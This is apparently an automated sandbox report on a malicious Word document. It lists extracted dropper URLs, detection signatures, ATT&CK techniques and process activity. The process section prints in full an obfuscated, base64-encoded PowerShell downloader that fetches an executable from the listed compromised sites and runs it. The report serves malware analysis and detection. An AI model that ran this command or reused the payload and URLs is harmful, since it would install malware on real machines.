Analysis

  • max time kernel
    104s
  • resource
    win10v191014
  • submitted
    07-01-2020 04:51

General

  • Target

    2019_04___REC_0370426885276201___9643537570004881753.doc

  • Sample

    200107-ygwfzyy35j

  • SHA256

    e8ca6c66c79cca9404a9f6a6920ff02010dc799435381a97fd5c57cf0c3abb41

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://xoso.thememanga.com/wp-admin/rqr/

exe.dropper

http://nuochoakichduc.info/wp-admin/HbS7j/

exe.dropper

http://nhasachthanhduy.com/master.class/zrJd/

exe.dropper

http://saphonzee.com/wp-includes/WdGrn8/

exe.dropper

https://tripaxi.com/All/Og86/

Signatures

  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2019_04___REC_0370426885276201___9643537570004881753.doc" /o ""
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID:4900
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -e JABpAEEARABvAEIAQgB3ACAAPQAgACcAOAAwACcAOwAkAG0AYwB3AEEARwBEAGMAeAA9ACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB4AEQAQQBBACcALAAnAEEAQgAnACwAJwBrACcAKQA7ACQAawBBAHcAeABjAEEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGkAQQBEAG8AQgBCAHcAKwAoACIAewAwAH0AewAxAH0AIgAtAGYAJwAuACcALAAnAGUAeABlACcAKQA7ACQAdQBBADQAQQBBAEEAQgBCAD0AKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBqACcALAAnAEEAXwBDAEEAMQAnACkAOwAkAEYAMQB4AFUAQQBBAD0AbgBlAFcALQBPAGAAQgBqAEUAYABDAFQAIAAoACcATgBlAHQALgBXAGUAJwArACcAYgAnACsAJwBDAGwAaQBlACcAKwAnAG4AJwArACcAdAAnACkAOwAkAHYAQQBaAFUARABBAEEAQwA9ACgAIgB7ADIAfQB7ADMAfQB7ADIAMgB9AHsAMwA4AH0AewA0ADEAfQB7ADIAOQB9AHsANAAzAH0AewA0ADQAfQB7ADkAfQB7ADEAMgB9AHsAMQA5AH0AewA4AH0AewAxAH0AewAyADgAfQB7ADMANQB9AHsAMQA4AH0AewAyADEAfQB7ADIANgB9AHsANAAwAH0AewAyADcAfQB7ADEAMAB9AHsANAAyAH0AewAzADAAfQB7ADMAMgB9AHsAMgA0AH0AewAwAH0AewAzADEAfQB7ADEANQB9AHsAMQA2AH0AewA2AH0AewA3AH0AewAxADQAfQB7ADEAMQB9AHsANAB9AHsAMQA3AH0AewAyADUAfQB7ADMAMwB9AHsAMQAzAH0AewAzADQAfQB7ADIAMwB9AHsANQB9AHsAMgAwAH0AewAzADkAfQB7ADMANgB9AHsAMwA3AH0AIgAgAC0AZgAgACcAbgB6ACcALAAnAGkAJwAsACcAaAB0AHQAcAAnACwAJwA6AC8ALwB4AG8AcwBvAC4AdAAnACwAJwBXAGQARwByAG4AJwAsACcALwAnACwAJwB3AHAALQBpAG4AYwAnACwAJwBsAHUAJwAsACcAbwBhAGsAaQBjAGgAZAB1AGMALgAnACwAJwBAAGgAJwAsACcAYwBvAG0AJwAsACcALwAnACwAJwB0AHQAcAA6AC8AJwAsACcAcwA6AC8ALwAnACwAJwBkAGUAcwAnACwAJwAuAGMAbwBtACcALAAnAC8AJwAsACcAOAAvACcALAAnAEgAYgBTADcAagAvAEAAaAB0AHQAcAAnACwAJwAvAG4AdQBvAGMAaAAnACwAJwBBAGwAbAAvAE8AJwAsACcAOgAvAC8AbgBoACcALAAnAGgAJwAsACcAcABhAHgAaQAuAGMAbwBtACcALAAnAHQAdABwADoALwAvAHMAYQBwAGgAbwAnACwAJwBAAGgAdAAnACwAJwBhAHMAYQBjAGgAdABoAGEAbgAnACwAJwB1AHkALgAnACwAJwBuAGYAbwAvAHcAcAAtAGEAJwAsACcAcAAtAGEAZAAnACwAJwBhAHMAdABlAHIALgBjAGwAYQBzAHMALwB6AHIAJwAsACcAZQBlACcALAAnAEoAZAAvAEAAaAAnACwAJwB0AHAAJwAsACcAdAByAGkAJwAsACcAZABtAGkAbgAvACcALAAnADYAJwAsACcALwAnACwAJwBlAG0AZQBtAGEAbgBnAGEALgBjAG8AbQAnACwAJwBnADgAJwAsACcAaABkACcALAAnAC8AdwAnACwAJwAvAG0AJwAsACcAbQBpACcALAAnAG4ALwByAHEAcgAvACcAKQAuACIAUwBwAGwAYABJAFQAIgAoACcAQAAnACkAOwAkAFcAdwBvAEEAQwBDAD0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACAAJwBBAFgARABVACcALAAnAHIAJwAsACcAQwBEAFEAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAWQBjAFEAMQBfAHgAIABpAG4AIAAkAHYAQQBaAFUARABBAEEAQwApAHsAdAByAHkAewAkAEYAMQB4AFUAQQBBAC4AIgBEAGAAbwBgAFcATgBsAE8AYABBAGQAZgBJAEwAZQAiACgAJABZAGMAUQAxAF8AeAAsACAAJABrAEEAdwB4AGMAQQApADsAJABHAHcAXwB4AEEAUQBBAEIAPQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAJwBBAEMAWABBACcALAAnAEwAJwAsACcAbwBYAEEAJwApADsASQBmACAAKAAoAEcAZQBgAFQAYAAtAGkAVABFAE0AIAAkAGsAQQB3AHgAYwBBACkALgAiAGwARQBgAE4AZwB0AEgAIgAgAC0AZwBlACAAMwA2ADEAOQA4ACkAIAB7AGkATgBgAFYATwBLAGUALQBpAFQAYABFAG0AIAAkAGsAQQB3AHgAYwBBADsAJABpAFEAQgBVAEEAdwAxAFUAPQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcARQAnACwAJwBaAEEAJwAsACcAQQBBADQAVQAnACkAOwBiAHIAZQBhAGsAOwAkAEgAawA0AGsAVQBDAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBCAGMAVQBCADQAQwAnACwAJwB6ACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAaAA0AEEAQgA0AEEAQQA9ACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcARABBACcALAAnAFQAXwBCAFEAJwApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:4176

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads